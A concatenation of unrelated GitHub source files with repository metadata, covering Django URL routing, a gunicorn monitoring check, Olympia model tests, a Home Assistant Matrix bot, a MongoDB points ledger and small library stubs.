                perm in self.permissions
            )
    return OneOf
|
{
"content_hash": "57719bb19912de9b92689ba935e63999",
"timestamp": "",
"source": "github",
"line_count": 263,
"max_line_length": 104,
"avg_line_length": 34.80988593155894,
"alnum_prop": 0.6242490442381212,
"repo_name": "onepercentclub/bluebottle",
"id": "8299b1b2cca0a63028d86328ef68ba88fea5c8bf",
"size": "9155",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bluebottle/utils/permissions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "41694"
},
{
"name": "HTML",
"bytes": "246695"
},
{
"name": "Handlebars",
"bytes": "63"
},
{
"name": "JavaScript",
"bytes": "139123"
},
{
"name": "PHP",
"bytes": "35"
},
{
"name": "PLpgSQL",
"bytes": "1369882"
},
{
"name": "PostScript",
"bytes": "2927"
},
{
"name": "Python",
"bytes": "4983116"
},
{
"name": "Rich Text Format",
"bytes": "39109"
},
{
"name": "SCSS",
"bytes": "99555"
},
{
"name": "Shell",
"bytes": "3068"
},
{
"name": "Smarty",
"bytes": "3814"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
# URL routes: the Grappelli admin skin, the Django admin itself, and media
# files served straight from MEDIA_ROOT via the static() helper.
urlpatterns = [
    url(r'^grappelli/', include('grappelli.urls')),
    url(r'^admin/', include(admin.site.urls)),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
{
"content_hash": "ab0b389117ad08c05f51eaf011d78a7b",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 65,
"avg_line_length": 37,
"alnum_prop": 0.7507507507507507,
"repo_name": "CodeforLeipzig/fog",
"id": "f86822c7cfb0ff2257c8c57c0c193b3330787536",
"size": "357",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "fog/config/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "204"
},
{
"name": "HTML",
"bytes": "12021"
},
{
"name": "JavaScript",
"bytes": "1"
},
{
"name": "Makefile",
"bytes": "5210"
},
{
"name": "Python",
"bytes": "17765"
},
{
"name": "Shell",
"bytes": "131"
}
],
"symlink_target": ""
}
|
"""
Collects metrics from the gunicorn web server.
http://gunicorn.org/
"""
# stdlib
import time
# 3rd party
import psutil
# project
from checks import AgentCheck
class GUnicornCheck(AgentCheck):
    """Agent check reporting the number of working vs. idle gunicorn workers."""

    # Config
    PROC_NAME = 'proc_name'

    # Number of seconds to sleep between cpu time checks.
    CPU_SLEEP_SECS = 0.1

    # Worker state tags.
    IDLE_TAGS = ["state:idle"]
    WORKING_TAGS = ["state:working"]

    SVC_NAME = "gunicorn.is_running"

    def get_library_versions(self):
        """Report the psutil version this check relies on."""
        return {"psutil": psutil.__version__}

    def check(self, instance):
        """ Collect metrics for the given gunicorn instance. """
        self.log.debug("Running instance: %s", instance)

        # Validate the config.
        if not instance or self.PROC_NAME not in instance:
            raise GUnicornCheckError("instance must specify: %s" % self.PROC_NAME)

        # Load the gunicorn master procedure.
        proc_name = instance.get(self.PROC_NAME)
        master_proc = self._get_master_proc_by_name(proc_name)

        # Fetch the worker procs and count their states.
        worker_procs = master_proc.children()
        working, idle = self._count_workers(worker_procs)

        # if no workers are running, alert CRITICAL, otherwise OK
        msg = "%s working and %s idle workers for %s" % (working, idle, proc_name)
        status = AgentCheck.CRITICAL if working == 0 and idle == 0 else AgentCheck.OK
        self.service_check(self.SVC_NAME, status, tags=['app:' + proc_name], message=msg)

        # Submit the data.
        self.log.debug("instance %s procs - working:%s idle:%s" % (proc_name, working, idle))
        self.gauge("gunicorn.workers", working, self.WORKING_TAGS)
        self.gauge("gunicorn.workers", idle, self.IDLE_TAGS)

    def _count_workers(self, worker_procs):
        """Classify *worker_procs* as (working, idle) by sampling CPU time twice."""
        working = 0
        idle = 0

        if not worker_procs:
            return working, idle

        # Count how much sleep time is used by the workers.
        cpu_time_by_pid = {}
        for proc in worker_procs:
            # cpu time is the sum of user + system time.
            try:
                cpu_time_by_pid[proc.pid] = sum(proc.cpu_times())
            except psutil.NoSuchProcess:
                # BUGFIX: interpolate proc.pid rather than proc.name -- in the
                # psutil 2.x API used throughout this class (cpu_times(),
                # cmdline() are called as methods), `name` is a method, so the
                # old code logged a bound-method repr; calling name() here
                # could itself raise NoSuchProcess for a dead process.
                self.warning('Process %s disappeared while scanning' % proc.pid)
                continue

        # Let them do a little bit more work.
        time.sleep(self.CPU_SLEEP_SECS)

        # Processes which have used more CPU are considered active (this is a very
        # naive check, but gunicorn exposes no stats API)
        for proc in worker_procs:
            if proc.pid not in cpu_time_by_pid:
                # The process is not running anymore, we didn't collect initial cpu times
                continue
            try:
                cpu_time = sum(proc.cpu_times())
            except Exception:
                # couldn't collect cpu time. assume it's dead.
                self.log.debug("Couldn't collect cpu time for %s" % proc)
                continue
            if cpu_time == cpu_time_by_pid[proc.pid]:
                idle += 1
            else:
                working += 1

        return working, idle

    def _get_master_proc_by_name(self, name):
        """ Return a psutil process for the master gunicorn process with the given name. """
        master_name = GUnicornCheck._get_master_proc_name(name)
        master_procs = [p for p in psutil.process_iter() if p.cmdline() and p.cmdline()[0] == master_name]
        if len(master_procs) == 0:
            # process not found, it's dead.
            self.service_check(self.SVC_NAME, AgentCheck.CRITICAL, tags=['app:' + name],
                               message="No gunicorn process with name %s found" % name)
            raise GUnicornCheckError("Found no master process with name: %s" % master_name)
        elif len(master_procs) > 1:
            raise GUnicornCheckError("Found more than one master process with name: %s" % master_name)
        else:
            return master_procs[0]

    @staticmethod
    def _get_master_proc_name(name):
        """ Return the name of the master gunicorn process for the given proc name. """
        # Here's an example of a process list for a gunicorn box with name web1
        # root     22976  0.1  0.1  60364 13424 ?      Ss   19:30   0:00 gunicorn: master [web1]
        # web      22984 20.7  2.3 521924 176136 ?     Sl   19:30   1:58 gunicorn: worker [web1]
        # web      22985 26.4  6.1 795288 449596 ?     Sl   19:30   2:32 gunicorn: worker [web1]
        return "gunicorn: master [%s]" % name
class GUnicornCheckError(Exception):
    """Raised for bad configuration or when the gunicorn master can't be found."""
|
{
"content_hash": "3cb66880a3c63702f6a511db3d77ad47",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 106,
"avg_line_length": 37.61788617886179,
"alnum_prop": 0.5975794251134644,
"repo_name": "mderomph-coolblue/dd-agent",
"id": "05766dbd0e62fa319557f0d002b1d0c0530dea68",
"size": "4627",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "checks.d/gunicorn.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "2717"
},
{
"name": "Go",
"bytes": "2389"
},
{
"name": "HTML",
"bytes": "8758"
},
{
"name": "Nginx",
"bytes": "3908"
},
{
"name": "PowerShell",
"bytes": "2665"
},
{
"name": "Python",
"bytes": "2051024"
},
{
"name": "Ruby",
"bytes": "98141"
},
{
"name": "Shell",
"bytes": "54709"
},
{
"name": "XSLT",
"bytes": "2222"
}
],
"symlink_target": ""
}
|
import mock
import pytest
from mock import Mock
from nose.tools import eq_
from olympia import amo
from olympia.amo import models as amo_models
from olympia.amo.tests import TestCase
from olympia.amo import models as context
from olympia.addons.models import Addon
from olympia.users.models import UserProfile
pytestmark = pytest.mark.django_db
class ManualOrderTest(TestCase):
    """Exercise amo_models.manual_order against a fixed set of addon fixtures."""
    fixtures = ('base/addon_3615', 'base/addon_5299_gcal', 'base/addon_40')

    def test_ordering(self):
        """manual_order must return addons in exactly the pk order requested."""
        requested_order = [40, 5299, 3615]
        ordered = amo_models.manual_order(Addon.objects.all(), requested_order)
        eq_(requested_order, [addon.id for addon in ordered])
def test_skip_cache():
    """Nested skip_cache() contexts keep the flag set until the outermost exit."""
    # Flag is unset (or absent) before entering the context manager.
    eq_(getattr(context._locals, 'skip_cache', False), False)
    with context.skip_cache():
        eq_(context._locals.skip_cache, True)
        # Re-entering must not clobber the flag...
        with context.skip_cache():
            eq_(context._locals.skip_cache, True)
        # ...and leaving the inner context keeps it set.
        eq_(context._locals.skip_cache, True)
    # Only the outermost exit resets it.
    eq_(context._locals.skip_cache, False)
def test_use_master():
    """Nested use_master() contexts keep the db pin until the outermost exit."""
    local = context.multidb.pinning._locals
    # Unpinned (or attribute absent) before entering.
    eq_(getattr(local, 'pinned', False), False)
    with context.use_master():
        eq_(local.pinned, True)
        # Re-entering keeps the pin in place...
        with context.use_master():
            eq_(local.pinned, True)
        # ...even after the inner context exits.
        eq_(local.pinned, True)
    # Only the outermost exit unpins.
    eq_(local.pinned, False)
class TestModelBase(TestCase):
    """Tests for the on-change callback machinery and helpers in amo.models."""
    # Known addon fixture (pk=3615) used throughout these tests.
    fixtures = ['base/addon_3615']

    def setUp(self):
        """Swap in a fresh mock on-change callback, saving any existing ones."""
        super(TestModelBase, self).setUp()
        self.saved_cb = amo_models._on_change_callbacks.copy()
        amo_models._on_change_callbacks.clear()
        self.cb = Mock()
        self.cb.__name__ = 'testing_mock_callback'
        Addon.on_change(self.cb)

    def tearDown(self):
        # Restore the callbacks captured in setUp so other tests are unaffected.
        amo_models._on_change_callbacks = self.saved_cb
        super(TestModelBase, self).tearDown()

    def test_multiple_ignored(self):
        """Registering the same callback twice must not add a duplicate."""
        cb = Mock()
        cb.__name__ = 'something'
        old = len(amo_models._on_change_callbacks[Addon])
        Addon.on_change(cb)
        eq_(len(amo_models._on_change_callbacks[Addon]), old + 1)
        Addon.on_change(cb)
        eq_(len(amo_models._on_change_callbacks[Addon]), old + 1)

    def test_change_called_on_new_instance_save(self):
        """The callback fires with old/new attrs when a new instance is saved."""
        for create_addon in (Addon, Addon.objects.create):
            addon = create_addon(site_specific=False, type=amo.ADDON_EXTENSION)
            addon.site_specific = True
            addon.save()
            assert self.cb.called
            kw = self.cb.call_args[1]
            eq_(kw['old_attr']['site_specific'], False)
            eq_(kw['new_attr']['site_specific'], True)
            eq_(kw['instance'].id, addon.id)
            eq_(kw['sender'], Addon)

    def test_change_called_on_update(self):
        """The callback also fires on .update() with the attr diff."""
        addon = Addon.objects.get(pk=3615)
        addon.update(site_specific=False)
        assert self.cb.called
        kw = self.cb.call_args[1]
        eq_(kw['old_attr']['site_specific'], True)
        eq_(kw['new_attr']['site_specific'], False)
        eq_(kw['instance'].id, addon.id)
        eq_(kw['sender'], Addon)

    def test_change_called_on_save(self):
        """The callback fires on .save() of an existing instance."""
        addon = Addon.objects.get(pk=3615)
        addon.site_specific = False
        addon.save()
        assert self.cb.called
        kw = self.cb.call_args[1]
        eq_(kw['old_attr']['site_specific'], True)
        eq_(kw['new_attr']['site_specific'], False)
        eq_(kw['instance'].id, addon.id)
        eq_(kw['sender'], Addon)

    def test_change_is_not_recursive(self):
        """A callback that saves/updates the instance must not re-trigger itself."""

        class fn:
            # Flag flipped by the callback so we can assert it ran.
            called = False

        def callback(old_attr=None, new_attr=None, instance=None,
                     sender=None, **kw):
            fn.called = True
            # Both save and update should be protected:
            instance.update(site_specific=False)
            instance.save()

        Addon.on_change(callback)

        addon = Addon.objects.get(pk=3615)
        addon.save()
        assert fn.called
        # No exception = pass

    def test_safer_get_or_create(self):
        """Second call with identical data fetches instead of creating."""
        data = {'guid': '123', 'type': amo.ADDON_EXTENSION}
        a, c = Addon.objects.safer_get_or_create(**data)
        assert c
        b, c = Addon.objects.safer_get_or_create(**data)
        assert not c
        eq_(a, b)

    def test_reload(self):
        """reload() refreshes the in-memory instance from the database."""
        # Make it an extension.
        addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
        addon.save()

        # Make it a persona.
        Addon.objects.get(id=addon.id).update(type=amo.ADDON_PERSONA)

        # Still an extension.
        eq_(addon.type, amo.ADDON_EXTENSION)

        # Reload. And it's magically now a persona.
        eq_(addon.reload().type, amo.ADDON_PERSONA)
        eq_(addon.type, amo.ADDON_PERSONA)

    def test_get_unfiltered_manager(self):
        # NOTE(review): these comparisons are not asserted -- their results are
        # discarded, so the test can never fail here; presumably eq_() was
        # intended. Left byte-identical pending confirmation.
        Addon.get_unfiltered_manager() == Addon.unfiltered
        UserProfile.get_unfiltered_manager() == UserProfile.objects

    def test_measure_save_time(self):
        """Saving emits the cache_machine post_save statsd timer."""
        addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
        with mock.patch('olympia.amo.models.statsd.timer') as timer:
            addon.save()
        timer.assert_any_call('cache_machine.manager.post_save')

    def test_measure_delete_time(self):
        """Deleting emits the cache_machine post_delete statsd timer."""
        addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
        with mock.patch('olympia.amo.models.statsd.timer') as timer:
            addon.delete()
        timer.assert_any_call('cache_machine.manager.post_delete')
def test_cache_key():
    """Cache keys must be identical regardless of the db alias used."""
    # Test that we are not taking the db into account when building our
    # cache keys for django-cache-machine. See bug 928881.
    eq_(Addon._cache_key(1, 'default'), Addon._cache_key(1, 'slave'))
|
{
"content_hash": "44a2f69dcda28bf899b8db8dbd8697ea",
"timestamp": "",
"source": "github",
"line_count": 170,
"max_line_length": 79,
"avg_line_length": 33.71176470588235,
"alnum_prop": 0.6126330483336242,
"repo_name": "jpetto/olympia",
"id": "15127054eeed20731acc38c96940587aa97535a5",
"size": "5731",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/olympia/amo/tests/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "249"
},
{
"name": "CSS",
"bytes": "665496"
},
{
"name": "HTML",
"bytes": "1606994"
},
{
"name": "JavaScript",
"bytes": "1315514"
},
{
"name": "Makefile",
"bytes": "4235"
},
{
"name": "PLSQL",
"bytes": "74"
},
{
"name": "Python",
"bytes": "4026490"
},
{
"name": "Shell",
"bytes": "9145"
},
{
"name": "Smarty",
"bytes": "1930"
}
],
"symlink_target": ""
}
|
"""The matrix bot component."""
import logging
import os
from functools import partial
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.notify import ATTR_TARGET, ATTR_MESSAGE
from homeassistant.const import (
CONF_USERNAME,
CONF_PASSWORD,
CONF_VERIFY_SSL,
CONF_NAME,
EVENT_HOMEASSISTANT_STOP,
EVENT_HOMEASSISTANT_START,
)
from homeassistant.util.json import load_json, save_json
from homeassistant.exceptions import HomeAssistantError
_LOGGER = logging.getLogger(__name__)

# File (relative to the HA config dir) where auth tokens persist between runs.
SESSION_FILE = ".matrix.conf"

CONF_HOMESERVER = "homeserver"
CONF_ROOMS = "rooms"
CONF_COMMANDS = "commands"
CONF_WORD = "word"
CONF_EXPRESSION = "expression"

# Event fired on the HA bus whenever a configured command matches a message.
EVENT_MATRIX_COMMAND = "matrix_command"

DOMAIN = "matrix"

COMMAND_SCHEMA = vol.All(
    # Basic Schema
    vol.Schema(
        {
            # A command triggers on either a leading "!word" or a regex match,
            # never both.
            vol.Exclusive(CONF_WORD, "trigger"): cv.string,
            vol.Exclusive(CONF_EXPRESSION, "trigger"): cv.is_regex,
            vol.Required(CONF_NAME): cv.string,
            # An empty rooms list means "all listening rooms" (filled in by
            # MatrixBot.__init__).
            vol.Optional(CONF_ROOMS, default=[]): vol.All(cv.ensure_list, [cv.string]),
        }
    ),
    # Make sure it's either a word or an expression command
    cv.has_at_least_one_key(CONF_WORD, CONF_EXPRESSION),
)

CONFIG_SCHEMA = vol.Schema(
    {
        DOMAIN: vol.Schema(
            {
                vol.Required(CONF_HOMESERVER): cv.url,
                vol.Optional(CONF_VERIFY_SSL, default=True): cv.boolean,
                # Matrix IDs look like @localpart:homeserver.
                vol.Required(CONF_USERNAME): cv.matches_regex("@[^:]*:.*"),
                vol.Required(CONF_PASSWORD): cv.string,
                vol.Optional(CONF_ROOMS, default=[]): vol.All(
                    cv.ensure_list, [cv.string]
                ),
                vol.Optional(CONF_COMMANDS, default=[]): [COMMAND_SCHEMA],
            }
        )
    },
    extra=vol.ALLOW_EXTRA,
)

SERVICE_SEND_MESSAGE = "send_message"

SERVICE_SCHEMA_SEND_MESSAGE = vol.Schema(
    {
        vol.Required(ATTR_MESSAGE): cv.string,
        vol.Required(ATTR_TARGET): vol.All(cv.ensure_list, [cv.string]),
    }
)
def setup(hass, config):
    """Set up the Matrix bot component."""
    from matrix_client.client import MatrixRequestError

    conf = config[DOMAIN]
    session_file = os.path.join(hass.config.path(), SESSION_FILE)

    try:
        # Login happens inside the MatrixBot constructor.
        matrix_bot = MatrixBot(
            hass,
            session_file,
            conf[CONF_HOMESERVER],
            conf[CONF_VERIFY_SSL],
            conf[CONF_USERNAME],
            conf[CONF_PASSWORD],
            conf[CONF_ROOMS],
            conf[CONF_COMMANDS],
        )
    except MatrixRequestError as exception:
        _LOGGER.error("Matrix failed to log in: %s", str(exception))
        return False

    hass.data[DOMAIN] = matrix_bot
    hass.services.register(
        DOMAIN,
        SERVICE_SEND_MESSAGE,
        matrix_bot.handle_send_message,
        schema=SERVICE_SCHEMA_SEND_MESSAGE,
    )
    return True
class MatrixBot:
"""The Matrix Bot."""
def __init__(
self,
hass,
config_file,
homeserver,
verify_ssl,
username,
password,
listening_rooms,
commands,
):
"""Set up the client."""
self.hass = hass
self._session_filepath = config_file
self._auth_tokens = self._get_auth_tokens()
self._homeserver = homeserver
self._verify_tls = verify_ssl
self._mx_id = username
self._password = password
self._listening_rooms = listening_rooms
# We have to fetch the aliases for every room to make sure we don't
# join it twice by accident. However, fetching aliases is costly,
# so we only do it once per room.
self._aliases_fetched_for = set()
# word commands are stored dict-of-dict: First dict indexes by room ID
# / alias, second dict indexes by the word
self._word_commands = {}
# regular expression commands are stored as a list of commands per
# room, i.e., a dict-of-list
self._expression_commands = {}
for command in commands:
if not command.get(CONF_ROOMS):
command[CONF_ROOMS] = listening_rooms
if command.get(CONF_WORD):
for room_id in command[CONF_ROOMS]:
if room_id not in self._word_commands:
self._word_commands[room_id] = {}
self._word_commands[room_id][command[CONF_WORD]] = command
else:
for room_id in command[CONF_ROOMS]:
if room_id not in self._expression_commands:
self._expression_commands[room_id] = []
self._expression_commands[room_id].append(command)
# Log in. This raises a MatrixRequestError if login is unsuccessful
self._client = self._login()
def handle_matrix_exception(exception):
"""Handle exceptions raised inside the Matrix SDK."""
_LOGGER.error("Matrix exception:\n %s", str(exception))
self._client.start_listener_thread(exception_handler=handle_matrix_exception)
def stop_client(_):
"""Run once when Home Assistant stops."""
self._client.stop_listener_thread()
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_client)
# Joining rooms potentially does a lot of I/O, so we defer it
def handle_startup(_):
"""Run once when Home Assistant finished startup."""
self._join_rooms()
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START, handle_startup)
def _handle_room_message(self, room_id, room, event):
"""Handle a message sent to a room."""
if event["content"]["msgtype"] != "m.text":
return
if event["sender"] == self._mx_id:
return
_LOGGER.debug("Handling message: %s", event["content"]["body"])
if event["content"]["body"][0] == "!":
# Could trigger a single-word command.
pieces = event["content"]["body"].split(" ")
cmd = pieces[0][1:]
command = self._word_commands.get(room_id, {}).get(cmd)
if command:
event_data = {
"command": command[CONF_NAME],
"sender": event["sender"],
"room": room_id,
"args": pieces[1:],
}
self.hass.bus.fire(EVENT_MATRIX_COMMAND, event_data)
# After single-word commands, check all regex commands in the room
for command in self._expression_commands.get(room_id, []):
match = command[CONF_EXPRESSION].match(event["content"]["body"])
if not match:
continue
event_data = {
"command": command[CONF_NAME],
"sender": event["sender"],
"room": room_id,
"args": match.groupdict(),
}
self.hass.bus.fire(EVENT_MATRIX_COMMAND, event_data)
def _join_or_get_room(self, room_id_or_alias):
"""Join a room or get it, if we are already in the room.
We can't just always call join_room(), since that seems to crash
the client if we're already in the room.
"""
rooms = self._client.get_rooms()
if room_id_or_alias in rooms:
_LOGGER.debug("Already in room %s", room_id_or_alias)
return rooms[room_id_or_alias]
for room in rooms.values():
if room.room_id not in self._aliases_fetched_for:
room.update_aliases()
self._aliases_fetched_for.add(room.room_id)
if room_id_or_alias in room.aliases:
_LOGGER.debug(
"Already in room %s (known as %s)", room.room_id, room_id_or_alias
)
return room
room = self._client.join_room(room_id_or_alias)
_LOGGER.info("Joined room %s (known as %s)", room.room_id, room_id_or_alias)
return room
def _join_rooms(self):
"""Join the rooms that we listen for commands in."""
from matrix_client.client import MatrixRequestError
for room_id in self._listening_rooms:
try:
room = self._join_or_get_room(room_id)
room.add_listener(
partial(self._handle_room_message, room_id), "m.room.message"
)
except MatrixRequestError as ex:
_LOGGER.error("Could not join room %s: %s", room_id, ex)
def _get_auth_tokens(self):
"""
Read sorted authentication tokens from disk.
Returns the auth_tokens dictionary.
"""
try:
auth_tokens = load_json(self._session_filepath)
return auth_tokens
except HomeAssistantError as ex:
_LOGGER.warning(
"Loading authentication tokens from file '%s' failed: %s",
self._session_filepath,
str(ex),
)
return {}
def _store_auth_token(self, token):
"""Store authentication token to session and persistent storage."""
self._auth_tokens[self._mx_id] = token
save_json(self._session_filepath, self._auth_tokens)
def _login(self):
"""Login to the matrix homeserver and return the client instance."""
from matrix_client.client import MatrixRequestError
# Attempt to generate a valid client using either of the two possible
# login methods:
client = None
# If we have an authentication token
if self._mx_id in self._auth_tokens:
try:
client = self._login_by_token()
_LOGGER.debug("Logged in using stored token.")
except MatrixRequestError as ex:
_LOGGER.warning(
"Login by token failed, falling back to password. "
"login_by_token raised: (%d) %s",
ex.code,
ex.content,
)
# If we still don't have a client try password.
if not client:
try:
client = self._login_by_password()
_LOGGER.debug("Logged in using password.")
except MatrixRequestError as ex:
_LOGGER.error(
"Login failed, both token and username/password invalid "
"login_by_password raised: (%d) %s",
ex.code,
ex.content,
)
# re-raise the error so _setup can catch it.
raise
return client
def _login_by_token(self):
"""Login using authentication token and return the client."""
from matrix_client.client import MatrixClient
return MatrixClient(
base_url=self._homeserver,
token=self._auth_tokens[self._mx_id],
user_id=self._mx_id,
valid_cert_check=self._verify_tls,
)
def _login_by_password(self):
    """Authenticate with username/password and cache the fresh token."""
    from matrix_client.client import MatrixClient

    client = MatrixClient(
        base_url=self._homeserver, valid_cert_check=self._verify_tls
    )
    client.login_with_password(self._mx_id, self._password)
    # Persist the newly issued token so the next login can reuse it.
    self._store_auth_token(client.token)
    return client
def _send_message(self, message, target_rooms):
    """Deliver *message* to every room in *target_rooms*.

    Failures are logged per room and do not stop delivery to the
    remaining rooms.
    """
    from matrix_client.client import MatrixRequestError

    for room_id in target_rooms:
        try:
            room = self._join_or_get_room(room_id)
            _LOGGER.debug(room.send_text(message))
        except MatrixRequestError as ex:
            _LOGGER.error(
                "Unable to deliver message to room '%s': (%d): %s",
                room_id,
                ex.code,
                ex.content,
            )
def handle_send_message(self, service):
    """Handle the matrix send_message service call."""
    data = service.data
    self._send_message(data[ATTR_MESSAGE], data[ATTR_TARGET])
|
{
"content_hash": "bc09689ea6bd01acf54bfeca35901d11",
"timestamp": "",
"source": "github",
"line_count": 372,
"max_line_length": 87,
"avg_line_length": 32.89784946236559,
"alnum_prop": 0.5603856839352835,
"repo_name": "joopert/home-assistant",
"id": "4a9435808bbf6637e9a1bba2b3f9a1673b88a3e2",
"size": "12238",
"binary": false,
"copies": "4",
"ref": "refs/heads/dev",
"path": "homeassistant/components/matrix/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "18670593"
},
{
"name": "Shell",
"bytes": "6846"
}
],
"symlink_target": ""
}
|
import sys
import re
import datetime
import time
import pymongo
from bson.objectid import ObjectId
# Data Access Object for the per-user points/shares ledger stored in MongoDB.
# Balances are never updated in place: every change appends a new document
# and readers take the newest document per user.
# NOTE(review): this module is Python 2 code (print statements, cursor
# .next()); it will not run under Python 3 without porting.
class PointsDAO:
    # constructor for the class
    def __init__(self, database):
        # `database` is expected to be a pymongo database handle; all reads
        # and writes go through its `points` collection.
        self.db = database
        self.points = database.points

    # Insert a new balance document for `user_id`.  Callers pass the
    # point/share balances as numeric strings; a UTC timestamp is attached
    # so get_points can order documents by recency.
    def insert_entry(self, user_id, points, shares):
        entry = {"user_id":user_id,
                 "points": points,
                 "shares": shares,
                 "time": datetime.datetime.utcnow()
                 }
        # now insert the document
        try:
            print "Inserting the put", entry
            self.points.insert(entry)
        except:
            # NOTE(review): bare except swallows every failure mode and only
            # prints a message -- consider narrowing and re-raising.
            print "Error inserting post"
            print "Unexpected error:", sys.exc_info()[0]
        return

    # Return the most recent balance document for `user_id` (highest "time").
    # Raises StopIteration when the user has no documents yet.
    def get_points(self, user_id):
        new = self.points.find({"user_id":user_id}).sort([("time", pymongo.DESCENDING)]).limit(1)
        return new.next()

    # Return the user's full balance history as a list, oldest first.
    def getAllpoints(self, user_id):
        new = self.points.find({"user_id":user_id}).sort([("time", pymongo.ASCENDING)])
        return list(new)

    # Record acceptance of a "put": the accepter pays
    # point_count * share_count points to the poster and receives
    # share_count shares from the poster.  Both parties get a new balance
    # document stamped with the same timestamp.
    def accept_put(self, poster_id, accepter_id, point_count, share_count):
        old_accepter = self.get_points(accepter_id)
        old_poster = self.get_points(poster_id)
        now = datetime.datetime.utcnow()
        print now
        # Balances are stored as strings; convert via float for the
        # arithmetic, truncate to int, and store back as a string.
        new_accepter= {"user_id": accepter_id,
                       "points": str(int(float(old_accepter["points"])-float(point_count)*float(share_count))),
                       "shares": str(int(float(old_accepter["shares"]) + float(share_count))),
                       "time": now
                       }
        new_poster= {"user_id": poster_id,
                     "points": str(int(float(old_poster["points"])+float(point_count)*float(share_count))),
                     "shares": str(int(float(old_poster["shares"]) - float(share_count))),
                     "time": now
                     }
        print new_accepter, new_poster
        self.points.insert(new_accepter)
        self.points.insert(new_poster)

    # Record acceptance of a "call": the accepter gains point_count points
    # and gives up share_count shares; the poster mirrors the change.
    # NOTE(review): unlike accept_put, points here are NOT multiplied by
    # share_count -- confirm this asymmetry is intended.
    def accept_call(self, poster_id, accepter_id, point_count,share_count):
        old_accepter=self.get_points(accepter_id)
        old_poster=self.get_points(poster_id)
        now=datetime.datetime.utcnow()
        new_accepter= {"user_id": accepter_id,
                       "points": str(int(float(old_accepter["points"])+float(point_count))),
                       "shares": str(int(float(old_accepter["shares"]) - float(share_count))),
                       "time": now
                       }
        new_poster= {"user_id": poster_id,
                     "points": str(int(float(old_poster["points"])-float(point_count))),
                     "shares": str(int(float(old_poster["shares"]) + float(share_count))),
                     "time": now
                     }
        self.points.insert(new_accepter)
        self.points.insert(new_poster)

    # Computer counterparty accepts a call from `poster_id`: deduct the
    # purchase cost and add the shares, but only when the poster can afford
    # it (resulting points would be non-negative); otherwise do nothing.
    def computer_accept_call(self, poster_id, point_count, share_count):
        old_poster = self.get_points(poster_id)
        now = datetime.datetime.utcnow()
        if int(float(old_poster["points"])-float(point_count)*float(share_count))>=0:
            new_poster= {"user_id": poster_id,
                         "points": str(int(float(old_poster["points"])-float(point_count)*float(share_count))),
                         "shares": str(int(float(old_poster["shares"]) + float(share_count))),
                         "time": now
                         }
            self.points.insert(new_poster)

    # Computer counterparty accepts a put from `poster_id`: credit the sale
    # proceeds and remove the shares, but only when the poster holds enough
    # shares; otherwise do nothing.
    def computer_accept_put(self, poster_id, point_count, share_count):
        old_poster = self.get_points(poster_id)
        now = datetime.datetime.utcnow()
        if int(float(old_poster["shares"]) - float(share_count)) >= 0:
            new_poster= {"user_id": poster_id,
                         "points": str(int(float(old_poster["points"])+float(point_count)*float(share_count))),
                         "shares": str(int(float(old_poster["shares"]) - float(share_count))),
                         "time": now
                         }
            self.points.insert(new_poster)
|
{
"content_hash": "11469e1ae23c324bb9b3001893876723",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 111,
"avg_line_length": 40.78703703703704,
"alnum_prop": 0.5595913734392736,
"repo_name": "jac2130/BettingIsBelieving",
"id": "95f8495bd5132401cec24a55fcbfb4d321993605",
"size": "4406",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Betting/pointsDAO.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "559"
},
{
"name": "HTML",
"bytes": "19563"
},
{
"name": "JavaScript",
"bytes": "271785"
},
{
"name": "Python",
"bytes": "94184"
}
],
"symlink_target": ""
}
|
"""Common imports for generated sqladmin client library."""
# pylint:disable=wildcard-import
import pkgutil
from googlecloudsdk.third_party.apitools.base.py import *
from googlecloudsdk.third_party.apis.sqladmin.v1beta3.sqladmin_v1beta3_client import *
from googlecloudsdk.third_party.apis.sqladmin.v1beta3.sqladmin_v1beta3_messages import *
__path__ = pkgutil.extend_path(__path__, __name__)
|
{
"content_hash": "313099edaddf75573fbaccac24b2d54b",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 88,
"avg_line_length": 39.6,
"alnum_prop": 0.7904040404040404,
"repo_name": "flgiordano/netcash",
"id": "8c6f3ec680bf6d72daaf62102f1bca68c1a05b5e",
"size": "396",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "+/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/sqladmin/v1beta3/__init__.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "622"
},
{
"name": "HTML",
"bytes": "33831"
},
{
"name": "JavaScript",
"bytes": "13859"
},
{
"name": "Shell",
"bytes": "2716"
}
],
"symlink_target": ""
}
|
class PymqiException(Exception):
    """
    Raised when an error occurs while interacting with IBM MQ via pymqi.
    """
|
{
"content_hash": "304ec04770f7b4795c4908c1b89937ed",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 62,
"avg_line_length": 28,
"alnum_prop": 0.6875,
"repo_name": "DataDog/integrations-core",
"id": "903277d8c14f74f7325ead902710e83751b3994e",
"size": "229",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
